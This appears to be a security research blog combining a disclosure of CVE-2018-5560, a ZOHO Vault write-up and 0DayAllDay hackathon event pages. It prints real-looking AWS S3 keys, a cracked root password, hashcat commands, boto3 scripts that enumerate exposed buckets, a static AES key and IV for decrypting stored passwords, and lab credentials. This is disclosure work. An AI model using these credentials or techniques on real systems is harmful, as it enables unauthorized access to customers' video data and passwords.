Executive Summary

During the 0DAYALLDAY Research Event a vulnerability was discovered (CVE-2018-5560) in the Guardzilla Security Video System Model #: GZ521W.  The vulnerability lies within the design and implementation of Amazon Simple Storage Service (S3) credentials inside the Guardzilla Security Camera firmware.  Accessing these S3 storage credentials is trivial for a moderately skilled attacker.

Upon inspection of the access rights given to the S3 credentials within the analyzed firmware it was discovered that the embedded S3 credentials have unlimited access to all S3 buckets provisioned for that account.  

While no user data was accessed during our testing, the embedded S3 credentials could easily be used to view and download any stored file/video in the associated buckets.

This issue is an instance of CWE-798: Use of Hard-coded Credentials. It has a CVSSv3 base score of 8.6, since once the password is known, any unauthenticated user can collect the data from any affected system over the internet.

Product Description

The Guardzilla All-In-One Video Security System is a home security platform that provides indoor video surveillance. More information about the product can be found at the vendor’s website. Only the GZ501W model was tested. It is not known if other models are affected.

Findings Overview

This section summarizes the strategic problems identified, risk ratings, and recommendations. The Detailed Testing section describes the attempted attacks, evidence (including screen shots), risk-ratings, and potential solutions.

The results from this testing as well as any additional details regarding any further exposure can be found in the Detailed Testing section.

Strategic Recommendations

Strategic recommendations are those actions that can be taken by an organization to address the findings outlined in the findings overview section of this executive summary in a more generic and global way, rather than fixing individual problems instance by instance.

Implementing one or more of these recommendations may greatly improve the security posture of an organization and/or reduce the attack surface or exposure of an application or environment as well as address multiple findings.

Recommendation for Guardzilla:

• Review the source code of the various resources and services to verify that no data is being passed to potential malicious 3^rd party providers.
• Limit the access policy of the associated embedded S3 credentials to minimize access to cross customer information.  
• Audit any and all 3^rd party libraries for vulnerabilities and update those libraries where necessary.

Benefits:

• Remediate all the findings from CVE-2018-5560
• Prevent the application from succumbing to future vulnerabilities.

Detailed Technical Description

During the event a Winbond SPIFlash chip Model #: 25Q128FVSG was identified.  The data sheet for the chip can be found here.

Once the firmware was extracted from that chip it was identified to contain a SquashFS file system and a Journaling Flash File System version 2 (JFFS2) file system.  It was also noted that the “Distribution Base” is Grain Media ARM Linux 3.3.

Once these file systems were extracted with binwalk, the following string was found in the Message of The Day (MOTD):

Copyright (C) 2005 Faraday Corp. www.faraday.com.tw

It was also noted that the /etc/shadow file contained the following DES encrypted password for the root administrator account:

root:MvynOwD449PkM:0:0:99999:7:::

Because DES has been deprecated since 2005 it was trivially cracked with dual Nvidia GeForce GTX 1080 Ti graphics cards:

hashcat -m 1500 -a 3 -o ../guardzilla.found -O -i --increment-min=8 --increment-max=12 -w 3 -t 50 ../guardzilla.hash ?a?a?a?a?a?a?a?a?a?a?a?a?a

Session..........: hashcat
Status...........: Cracked
Hash.Type........: descrypt, DES (Unix), Traditional DES
Hash.Target......: MvynOwD449PkM
Time.Started.....: Tue Oct  2 07:36:30 2018 (3 hours, 35 mins)
Time.Estimated...: Tue Oct  2 11:12:06 2018 (0 secs)
Guess.Mask.......: ?a?a?a?a?a?a?a?a [8]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:  1176.6 MH/s (49.11ms) @ Accel:8 Loops:1024 Thr:256 Vec:1
Speed.Dev.#2.....:   776.5 MH/s (106.80ms) @ Accel:16 Loops:1024 Thr:256 Vec:1
Speed.Dev.#*.....:  1953.0 MH/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 25226596581376/39062500000000 (64.58%)
Rejected.........: 0/25226596581376 (0.00%)
Restore.Point....: 201580544/312500000 (64.51%)
Candidates.#1....: sarKrvcz -> 9poL82dw
Candidates.#2....: AiLwoz3x -> jE3iABuo
HWMon.Dev.#1.....: Temp: 66c Fan: 99% Util: 99% Core:1797MHz Mem:5005MHz Bus:8
HWMon.Dev.#2.....: Temp: 82c Fan: 99% Util:100% Core:1632MHz Mem:4513MHz Bus:8

The recovered password: ‘GMANCIPC’

It was noted that during boot init script launches boot.sh which in turn launches both /mnt/mtd/startapp and /home/daemon.exe.  The startapp resource launches vg_boot.sh (which configures low level video settings) and main.exe.  The following table represents the binary information for both main.exe and daemon.exe:

Embedded S3 Credentials Unlimited Access Policy

Once the binaries were extracted from the firmware they were analyzed in IDA Pro to determine if any vulnerabilities could be identified.  Once the main.exe had been disassembled and analyzed it was noted that a set of strings resembled AWS credentials:

Following the references, we can see that they are exports from the binary that are labeled: accessKey, secretAccessKey, hostname, and bucket. This format lines up with how AWS bucket keys are designed:

The following script was developed to test the S3 credentials to determine if they were valid as well as determine what access writes the credentials had:

import boto3
# Create an S3 client
s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP34RKL7GGV7OQ',aws_secret_access_key='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',region_name='us-west-1')

try:
    result = s3.get_bucket_policy(Bucket='motion-detection')
    print(result)
except Exception as e:
    print(e)

When the run script would error out stating that no specific policy exists on the embedded credentials for the motion-detection bucket:

An error occurred (NoSuchBucketPolicy) when calling the GetBucketPolicy operation: The bucket policy does not exist

The previously mentioned script was modified to list any available S3 buckets accessible by the embedded credentials:

import boto3
# Create an S3 client
s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP34RKL7GGV7OQ',aws_secret_access_key='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',region_name='us-west-1')

try:
    result = s3.list_buckets()
    print(result)
except Exception as e:
    print(e)

Once run that script lists all buckets accessible by the embedded credentials

{
    'Buckets': [{
        'CreationDate': datetime.datetime(2017, 2, 16, 21, 52, 52, tzinfo = tzutc()),
        'Name': 'elasticbeanstalk-us-west-2-036770821135'
    }, {
        'CreationDate': datetime.datetime(2018, 4, 5, 15, 45, 22, tzinfo = tzutc()),
        'Name': 'facial-detection'
    }, {
        'CreationDate': datetime.datetime(2017, 11, 8, 19, 38, 15, tzinfo = tzutc()),
        'Name': 'free-video-storage'
    }, {
        'CreationDate': datetime.datetime(2018, 3, 9, 20, 7, 19, tzinfo = tzutc()),
        'Name': 'free-video-storage-persist'
    }, {
        'CreationDate': datetime.datetime(2016, 8, 15, 19, 53, 12, tzinfo = tzutc()),
        'Name': 'gz-rds-backups'
    }, {
        'CreationDate': datetime.datetime(2017, 11, 8, 19, 37, 44, tzinfo = tzutc()),
        'Name': 'gz-test-bucket'
    }, {
        'CreationDate': datetime.datetime(2017, 11, 8, 19, 38, 29, tzinfo = tzutc()),
        'Name': 'motion-detection'
    }, {
        'CreationDate': datetime.datetime(2017, 11, 8, 19, 38, 47, tzinfo = tzutc()),
        'Name': 'premium-video-storage'
    }, {
        'CreationDate': datetime.datetime(2018, 3, 9, 20, 6, 47, tzinfo = tzutc()),
        'Name': 'premium-video-storage-persist'
    }, {
        'CreationDate': datetime.datetime(2018, 1, 25, 20, 41, 16, tzinfo = tzutc()),
        'Name': 'rekognition-video-console-demo-cmh-guardzilla-2918n05v5rvh'
    }, {
        'CreationDate': datetime.datetime(2017, 5, 17, 16, 1, 9, tzinfo = tzutc()),
        'Name': 'setup-videos'
    }, {
        'CreationDate': datetime.datetime(2018, 1, 24, 23, 0, 39, tzinfo = tzutc()),
        'Name': 'wowza-test-bucket'
    }],
    'Owner': {
        'ID': 'a3db77fe2a21093a2f0d471b0a9677f8aff7c3c7b7a4944b752ccc0c3a4a4af7',
        'DisplayName': 'geoff'
    }
}

Using the PACU AWS framework it was determined that the embedded credentials don’t have permission to gather further details on policies:

{
  "AccessKeyId": "AKIAJQDP34RKL7GGV7OQ",
  "Arn": "arn:aws:iam::036770821135:user/motion-detection",
  "Roles": null,
  "KeyAlias": "Guardzilla",
  "AccountId": "036770821135",
  "UserId": "AIDAJQRSLLW52U7GLHFYE",
  "Groups": [],
  "Policies": [],
  "Permissions": {
    "Deny": {},
    "Allow": {}
  },
  "SecretAccessKey": "igH8yFmmpMbnkcUaCqXJIRIozKVaXaRhE7PWHAYa",
  "UserName": "",
  "RoleName": null,
  "SessionToken": null,
  "PermissionsConfirmed": false
}    

No further testing against the credentials was done to prevent the unintentional access of Guardzilla customer data.

OpenSSL 1.0.1g Multiple Vulnerabilities

It was also noted that an out of date OpenSSL library was being referenced inside the firmware.  The following table represents the publicly identified vulnerabilities affecting the OpenSSL Library version 1.0.1g.

Informational Findings

During the review it was noted that the Guardzilla camera listens on port 23 with an “ipc login” prompt by default.  It was also noted a large amount of UDP traffic was being sent to a US-EAST-2 Amazon server.  We also noted several HTTP requests going out to:

54.68.243.114 (ec2-54-68-243-114.us-west-2.compute.amazonaws.com)
http://54.68.243.114/apns/apns.php?cmd=reg_server&uid=G1KEXWU2BPWHCFZ5111A
http://54.68.243.114/apns/apns.php?cmd=raise_event&uid=G1KEXWU2BPWHCFZ5111A&event_type=1&event_time=1538239032
52.218.200.66 (s3-us-west-2-w.amazonaws.com)

During the binary review several external IP’s were identified as well as several external data sources.  The following table represents all identified external IP’s and data sources identified within the main.exe binary:

The highlighted hosts should be further investigated to be sure no unintended video surveillance data is being sent to those hosts/providers.  The iotcplatform.com host is especially troubling as it has been identified in previous Krebs on Security research:

It was also noted that a suspected UART port was identified on the circuit board.  However, Guardzilla removed two pull-up resistors for production units.  Replacement resistors were attempted and worked temporarily.  We are confident with the correct surface mount resistors connected to the 3.3-volt line and RX and TX lines the UART port would be usable.

Disclosure Timeline

● Sat, Sep 29, 2018: Issue discovered at 0DayAllDay Research Event
● Wed, Oct 3, 2018: Issue disclosed to Rapid7 for coordinated disclosure
● Wed, Oct 24, 2018: Issue disclosed to vendor
● Thu, Nov 8, 2018: Issue disclosed to CERT/CC as VRF#18-11-NPPXC
● Fri, Dec 14, 2018: CVE-2018-5560 reserved
● Thu, Dec 27, 2018: Public disclosure

As of this writing the vendor hasn't responded to any communication from Rapid7 or CERT.

Special Thanks

• Everyone at the 0DayAllDay Hacking Event!
• GeniusDen For hosting our event
• Rapid7 for coordinated disclosure
• The creators of Binwalk, PACU, and Hashcat
• Hermit for editing notes

When: September 29th, 2018
Time: 10:00 AM to 11:59 PM
Where: GeniusDen 3106 Commerce St, Dallas, TX 75226

RSVP on Meetup

Food & Drinks:

• There are several great places nearby to grab food.
• There will be some free booze (vodka, whiskey, beer) If you want you can bring some more.

Rules:

• Must participate. Researching for others counts
• If you find a vulnerability it's yours. (Unless otherwise noted. Vulnerabilities that involve health or known to be sue happy it will be required to do full disclosure to protect all involved.)
• If there is a bug bounty you get to choose what to do with the money. Sponsor next event or keep it. Maybe a little of both.
• Smoking analog or vape please step outside.
• Don't be a dick.

Prize's:

• Most found CVE's - $50 Gift Card to Amazon
• Best vulnerability found - $25 Gift Card to Amazon
• Community MVP - $25 Gift Card to Amazon
• Miss Congeniality - Hugs and Free 0DayAllDay T-Shirt

Hacking:

This quarters theme is Hardware Hacking.

• Arris Surfboard - Model SB6141 (Forced full disclosure)
• Netgear - CM500-100NAS Cable Modem (Forced full disclosure)
• AT&T Router/Gateway - Model 5268ac
• Guardzilla - All-In-One Video Security System
• D-Link N300 WiFi Router - Model DIR-605L H/W Ver.: B3, F/W Ver.: 2.09UI
• TP-Link 300 Wireless N Router - Model TL-WR841N
• TP-Link 150 Wireless N Router - Model TL-WR741ND
• Carl and Stuart Flexi Cam
• Space Invaders
• WYZE Cam - Model WYZECP1
• Couple surprise targets as well.
• If you have something you want to hack on feel free to bring it. (Please note you will have to relieve us of any damage that might happen, aka we will most likely break it.)

Details of targets

Listed here is any work done by others and can be used as reference or to jump start our work.

• Car and Stuart Flexi Cam Blog
• AT&T Router/Gateway Blog
• AT&T Router/Gateway Slides
• Guardzilla Not really vulnerabilities but interesting info that should be validated Post
• TP-Link 300 TL-WR841N We have already done some work on this one and found some easy wins.
• All targets should be Googled before hand just to double check if there is any pre-existing work.

Getting started

• Slides INIT_6 did for PWN School. Brief overview Slides

Tools & Equipment

• Laptop is required
• If you have a Bus Pirate, Shikra, OSEPP FTDI, JTagulator, or any UART or JTAG equipment you should bring it.  We will have enough equipment for teams of 3 or 4 people. That being said more is always better.
• We will have 2 soldering irons, Header pins, jumper wires, etc However, if you have some feel free to bring it.

Software

• Kali Linux (Already has most of the tools needed, You can use Windows but Linux will be better)
• Binwalk GitHub Make sure you follow the this install guide and do all the dependencies. GitHub Wiki
• OpenOCD for JTag Site

The second 0DayAllDay event was June 9th, 2018 from 10am to 9pm. It was organized by Spectant Security and Blackmarble.sh. More information on 0DayAllDay can be found here

Last 0DayAllDay event was focused around Password Managers, Thycotic, Keeper, ZOHO Vault were a some of the targets. Only bug that was found was for ZOHO Vault.

ZOHO Vault is an online password manager focused on businesses. Included in their software is a AD/LDAP provisioning application. The application ask some standard question like your master ZOHO Account Username and Password, Domain Administrator (What isn't really needed) Username and Password, connection details. After you fill this out, Application connects to the Domain Controller and you select the users you want to import into ZOHO Vault.

The AD/LDAP provisioning application stores the AES encryption key and IV in the source code. Obtaining these strings is trivial. You can use JetBrains.dotPeek for example to decompile the executable.

Once decompiled, you can see that Provisioning_Utils namespace has a CryptUtil class that uses a static string for both the Key and IV.

namespace Provisioning_Utils
{
    public class CryptUtil
{
private static UTF8Encoding encoding = new UTF8Encoding();
private static byte[] kBytes = CryptUtil.encoding.GetBytes("6ZUJiqpBKHuNuS@*");
private static byte[] tmpIV = CryptUtil.encoding.GetBytes("BJLTHGVTPJQMDEXO");

The vault.zoho.com account password and the Windows Administrator account password are stored in the provisioning.conf file as encrypted text. The Provisioning application can be ran on any computer on the domain. Access to this provisioning.conf file is not guaranteed to be protected. It some cases it would be fairly easy for unauthorized access to the provisioning.conf file.

I have successfully wrote a new standalone program that takes the encrypted text as an argument and decrypts the password showing the plain text password.

First, C# program I have made. It was pretty easy, just needed to copy and paste the decompiled code. Googled a few things, and surprisingly got it to build on the second try.

For full source code and binary check out my GitHub

You do need some other access to exploit this; however, for pentesters if they find this provisioning.conf file game over. Gain access to all the passwords saved on ZOHO Vault (Edit: You need a secondary password to decrypt the Vault) and have Domain Admin. It was reckless to have the keys to your kingdom so easily available.

ZOHO issued me their own CVE number: ZVE-2018-0976

Disclosure Timeline:
Found Vulnerability: June 8th, 2018
Disclosed to ZOHO: June 10th, 2018
ZOHO Closed: July 12th, 2018

Reward: Nothing :( 10 stupid points. I can't buy beer with points.

EDIT:

ZOHO Updates Ticket: July 13th, 2018

Reward: $100 and 10pts. We have beer money for the next event now.

After making a post I like to watch Google Analytics for my blog just to see the kind of response I get. Got a couple referrals from supportlab.zoho.com and docs.zoho.com less than a hour from posting on twitter. I think they have a twitter bot looking for their name. Anyways, they updated the ticket I had open with them.

It is true, I had an error. Even though you have the ZOHO Vault login password, you need a secondary encryption password to get access to the content (View Passwords).

They fixed the vulnerability by removing the unneeded ZOHO account password and using dynamic unique keys to encrypt scoped authentication token and AD Password for every installation.

Finial notes:

What this tells me is the Authentication token doesn't expire I thought this was true as I played around with it as well. Which was clear text before in the provisioning.conf. Now I am interested in the new way they are doing the keys. I'll have to take another look when I get some time.

When: June 9th, 2018
Time: 10:00 AM to 11:59 PM
Where: GeniusDen 3106 Commerce St, Dallas, TX 75226

RSVP on Meetup

Food & Drinks:

• There are several great places nearby to grab food.
• There will be some free booze (vodka, whiskey, beer) If you want you can bring some more.

Rules:

• Must participate. Researching for others counts
• If you find a vulnerability it's yours.
• If there is a bug bounty you get to choose what to do with the money. Sponsor next event or keep it. Maybe a little of both.
• Smoking analog or vape please step outside.
• Targets are on 192.168.66.0/24 network stay there :)
• Don't be a dick.

Prize's:

• Most found CVE's - $50 Gift Card to Amazon
• Best vulnerability found - $25 Gift Card to Amazon
• Community MVP - $25 Gift Card to Amazon
• Miss Congeniality - Hugs and Free 0DayAllDay t-shirt

Hacking:

This quarters theme is Password Managers and their associated Android applications.

• Keeper Security (Business) BugCrowd
• 1Password BugCrowd
• Thycotic Secret Server
• ManageEngine Password Manager Pro
• ZOHO Vault BugBounty

Details of targets

• Domain Server and General Info

  • HOST
    • Domain Controller Windows Server 2016
    • IP: 192.168.66.100
    • Domain: blackmarble.sh
    • Admin: administrator
    • Pass: ][Password][
    • Other users:
      • fox.zero
      • fox.one
      • ...
      • fox.ten
    • Global Read-Only Share: //WIN-7LPVLIICTR2/Data
      • cacert.pem This file is for importing into Burp for Android.
      • apks folder has all the .apk install files along with the decompiled source code.
      • Keeper folder has the install files for keeper along with it's agents.
      • ManageEngine PMP folder has the Windows agent and the installer.
      • gray folder has a .net decompiler program and injector
      • Thycotic has the agents and installer.
    • Global Read/Write Share: //WIN-7LPVLIICTR2/Share
      • Feel free to put whatever here.
  • Software
    • Thycotic Secret Server
      • URL: https://192.168.66.100/SecretServer
      • USER: admint
      • PASS: ][Password][
    • Thycotic Privliage Manager
      • URL: https://192.168.66.100/TMS/PrivilegeManager
      • USER: admint
      • PASS: ][Password][
    • ManageEngine Password Manager Pro
      • URL: https://192.168.66.100:7272/PassTrixMain.cc
      • USER: admin
      • PASS: admin
    • Keeper
      • Connector (bridge) is setup on 192.168.66.100
      • URL: https://keepersecurity.com/en_US/console/#login
      • USER: init6@init6.me
      • PASS: Will be disclosed at event.
    • ZOHO Vault
      • Connector (bridge) is setup on 192.168.66.100
      • URL: https://vault.zoho.com/online/main
      • USER: init6@init6.me
      • PASS: Will be disclosed at event.
    • 1Password (Online Only)

• Android

  • HOST

    • http://www.android-x86.org
    • IP: 192.168.11.11
    • VNC Ports: 6000 - 6017
    • To connect I suggest using Remmina.
    • Google User: blackmarble@gmail.com
    • Google Pass: Will be disclosed at event if you need it.

  • Software

    • Keeper
    • Thycotic Secret Server
    • Thycotic PAM
    • Password Manager - Zoho Vault
    • PMP (Couldn't get to work)
    • LastPass
    • Norton IDSafe
    • Google Play store works, If you want to attack something else thats okay.

  • Burp Configuration

    • Import the cacert.pem into your Burp. (Make sure you regenerate after you leave)
    • In the Android VM, Hit ALT+F1 to access terminal.
    • su to root
    • Configure iptables to redirect traffic to your Burp.
    • iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination BURP_ADDRESS:BURP_PORT
    • iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination BURP_ADDRESS:BURP_PORT
    • Restart the VM if you want to flush out existing iptable rules.
    • If you want to use your own cert check out my blog entry here

  • ADB Configuration

    • Android Documentation can be found here
    • In the Android VM, Hit ALT+F1 to access terminal.
    • Get the IP Address: ifconfig
    • adb connect ip_address

When: March 31st, 2018 April 7th, 2018
Time: 11am to 8pm+
Where: INIT_6's place. DM for address.

Food:

• I'll be providing Hamburgers, chips, dips, etc
• BYOB - Bring Your Own Booze

Rules:

• Must participate. Researching for others counts
• If you find a vulnerability it's yours.
• If there is a bug bounty you get to choose what to do with the money. Sponsor next event or keep it. Maybe a little of both.
• A quick vape inside is fine, Long sessions step outside.
• Smoking analog step outside.
• Targets are on 192.168.66.0/24 network stay there :)
• Don't be a dick.

Prize's:

• Most found CVE's - $50 Gift Card to Amazon
• Best vulnerability found - $50 Gift Card to Amazon
• Community MVP - $25 Gift Card to Amazon
• Miss Congeniality - $25 Gift Card to Amazon

Hacking:

• ManageEngine AD360
• ManageEngine Password Manager Pro
• Atlassian Jira
• tryGhost
• Cylance CylancePROTECT
• Cylance CylanceOPTICS
• MFA details provided at event.
• These are all VM's I can reset them if needed.

Details of targets

• Domain Server and General Info  HOST  Domain Controller Windows Server 2016 IP: 192.168.66.5 Domain: blackmarble.sh Admin: administrator Pass: ][Password][ Other users:  fox.zero fox.one ... fox.ten   Has a fun MFA thing to hack on ;) Global Share: \WIN-8CJ4M00PQSL\Data  has install files and some notes. gray folder has some .net decompiler programs cfr_0_122.jar is used to decompile java Feel free to put whatever here.      
• ManageEngine AD360  HOST  Windows 2016 Server IP: 192.168.66.6 Hostname: MANAGEENGINE-01 User: administrator Pass: ][Password][ Share for AD360, ADFree Tools, ADManager Plus, ADSelfService Plus: \MANAGEENGINE-01\ManageEngine Share for ADUdit Plus: \MANAGEENGINE-01\ManageEngine2 Each program has a folder called output what has the decompiled java source code.   Software  AD360  http://192.168.66.6:8082   AD360 Manager Plus  http://192.168.66.6:8080   ADAudit Plus  http://192.168.66.6:8081   ADSelfService Plus  http://192.168.66.6:8888      
• ManageEngine Password Manager Pro  HOST  Ubuntu Server 16.04.4 LTS IP: 192.168.66.25 Hostname: pmp User: fox Pass: ][Password][   Software  PMP  http://192.168.66.25:7272 Location: /home/fox/ManageEngine/PMP output folder has the decompiled source code.  /home/fox/ManageEngine/PMP/output /home/fox/ManageEngine/PMP/lib/output   What I have done so far https://init6.me/manageengine-password-pro/      
• Jira  HOST  CentOS 7 IP: 192.168.66.10 User: root Pass: ][Password][   Software  http://192.168.66.25:8080 User: fox Pass: ][Password][ Data locations  /var/atlassian/application-data/jira /opt/atlassian/jira output has the decompiled java source code Settings -> Application page has a spot to Upload an application which is where I want to start.      
• Cylance  HOST  Windows 10 Pro IP: 192.168.66.23 Hostname: Cylance-01.blackmarble.sh User: Administrator Pass: ][Password][